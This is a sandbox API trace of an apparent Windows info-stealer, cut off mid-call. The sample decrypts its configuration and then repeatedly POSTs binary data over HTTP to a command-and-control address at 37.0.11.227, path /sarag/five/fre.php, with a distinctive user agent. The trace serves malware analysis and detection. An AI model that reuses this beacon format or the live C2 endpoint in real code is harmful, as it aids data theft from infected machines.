GetProcessHeap () returned 0x690000 [0228.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0228.804] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfe0) returned 0x5cc [0228.806] Sleep (dwMilliseconds=0xea60) [0228.807] GetProcessHeap () returned 0x690000 [0228.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0228.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.815] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0228.820] GetProcessHeap () returned 0x690000 [0228.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0228.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.821] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.822] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.824] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.824] GetProcessHeap () returned 0x690000 [0228.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0228.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.827] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0228.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.827] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.828] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0228.828] GetProcessHeap () returned 0x690000 [0228.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0228.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.829] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.830] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.831] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.832] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.832] GetProcessHeap () returned 0x690000 [0228.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0228.832] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.832] GetProcessHeap () returned 0x690000 [0228.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0228.833] GetProcessHeap () returned 0x690000 [0228.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0228.835] GetProcessHeap () returned 0x690000 [0228.836] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0228.836] GetProcessHeap () returned 0x690000 [0228.836] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0228.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.841] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0228.846] GetProcessHeap () returned 0x690000 [0228.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0228.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.847] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0228.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.848] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.849] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.849] GetProcessHeap () returned 0x690000 [0228.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0228.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.850] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0228.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.851] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0228.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.852] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0228.852] GetProcessHeap () returned 0x690000 [0228.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0228.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.853] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0228.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.853] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0228.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.856] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0228.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.857] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0228.857] GetProcessHeap () returned 0x690000 [0228.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0228.857] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0228.857] GetProcessHeap () returned 0x690000 [0228.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0228.857] socket (af=2, type=1, protocol=6) returned 0x5d0 [0228.857] connect (s=0x5d0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0228.880] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0228.880] GetProcessHeap () returned 0x690000 [0228.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0228.880] GetProcessHeap () returned 0x690000 [0228.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0228.881] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.882] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.882] GetProcessHeap () returned 0x690000 [0228.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0228.882] GetProcessHeap () returned 0x690000 [0228.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.882] GetProcessHeap () returned 0x690000 [0228.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0228.883] GetProcessHeap () returned 0x690000 [0228.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0228.883] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.884] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.884] GetProcessHeap () returned 0x690000 [0228.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0228.884] GetProcessHeap () returned 0x690000 [0228.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.884] send (s=0x5d0, buf=0x6ab500*, len=242, flags=0) returned 242 [0228.885] send (s=0x5d0, buf=0x6aba40*, len=159, flags=0) returned 159 [0228.885] GetProcessHeap () returned 0x690000 [0228.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0228.885] recv (in: s=0x5d0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0228.958] GetProcessHeap () returned 0x690000 [0228.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0228.958] GetProcessHeap () returned 0x690000 [0228.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0228.959] GetProcessHeap () returned 0x690000 [0228.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0228.959] GetProcessHeap () returned 0x690000 [0228.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0228.960] closesocket (s=0x5d0) returned 0 [0228.960] GetProcessHeap () returned 0x690000 [0228.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0228.960] GetProcessHeap () returned 0x690000 [0228.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0228.961] GetProcessHeap () returned 0x690000 [0228.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0228.962] GetProcessHeap () returned 0x690000 [0228.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0228.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12e8) returned 0x5d0 [0228.964] Sleep (dwMilliseconds=0xea60) [0228.966] GetProcessHeap () returned 0x690000 [0228.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0228.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.967] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.971] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0228.978] GetProcessHeap () returned 0x690000 [0228.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0228.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.979] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.980] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.981] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.981] GetProcessHeap () returned 0x690000 [0228.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0228.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.992] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0228.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.993] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.994] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0228.994] GetProcessHeap () returned 0x690000 [0228.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.995] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.996] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.997] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.000] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.000] GetProcessHeap () returned 0x690000 [0229.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0229.000] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.000] GetProcessHeap () returned 0x690000 [0229.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0229.001] GetProcessHeap () returned 0x690000 [0229.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.001] GetProcessHeap () returned 0x690000 [0229.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0229.002] GetProcessHeap () returned 0x690000 [0229.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0229.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.003] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.022] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0229.029] GetProcessHeap () returned 0x690000 [0229.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0229.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.032] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0229.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.033] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.034] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.034] GetProcessHeap () returned 0x690000 [0229.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0229.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.046] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0229.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.047] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0229.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.048] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0229.048] GetProcessHeap () returned 0x690000 [0229.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.049] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0229.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.050] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0229.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.051] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0229.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.052] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0229.052] GetProcessHeap () returned 0x690000 [0229.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0229.052] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0229.052] GetProcessHeap () returned 0x690000 [0229.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0229.052] socket (af=2, type=1, protocol=6) returned 0x5d4 [0229.052] connect (s=0x5d4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0229.079] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0229.079] GetProcessHeap () returned 0x690000 [0229.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0229.079] GetProcessHeap () returned 0x690000 [0229.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0229.079] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.080] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.080] GetProcessHeap () returned 0x690000 [0229.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0229.080] GetProcessHeap () returned 0x690000 [0229.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.081] GetProcessHeap () returned 0x690000 [0229.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0229.081] GetProcessHeap () returned 0x690000 [0229.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0229.082] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.082] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.082] GetProcessHeap () returned 0x690000 [0229.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0229.083] GetProcessHeap () returned 0x690000 [0229.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.083] send (s=0x5d4, buf=0x6ad508*, len=242, flags=0) returned 242 [0229.083] send (s=0x5d4, buf=0x6aba40*, len=159, flags=0) returned 159 [0229.084] GetProcessHeap () returned 0x690000 [0229.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0229.084] recv (in: s=0x5d4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0229.157] GetProcessHeap () returned 0x690000 [0229.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0229.158] GetProcessHeap () returned 0x690000 [0229.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0229.159] GetProcessHeap () returned 0x690000 [0229.159] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0229.159] GetProcessHeap () returned 0x690000 [0229.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0229.160] closesocket (s=0x5d4) returned 0 [0229.160] GetProcessHeap () returned 0x690000 [0229.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0229.160] GetProcessHeap () returned 0x690000 [0229.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.161] GetProcessHeap () returned 0x690000 [0229.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0229.161] GetProcessHeap () returned 0x690000 [0229.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0229.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x132c) returned 0x5d4 [0229.163] Sleep (dwMilliseconds=0xea60) [0229.164] GetProcessHeap () returned 0x690000 [0229.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0229.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.167] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0229.178] GetProcessHeap () returned 0x690000 [0229.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0229.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.180] CryptImportKey (in: hProv=0x6aecc0, 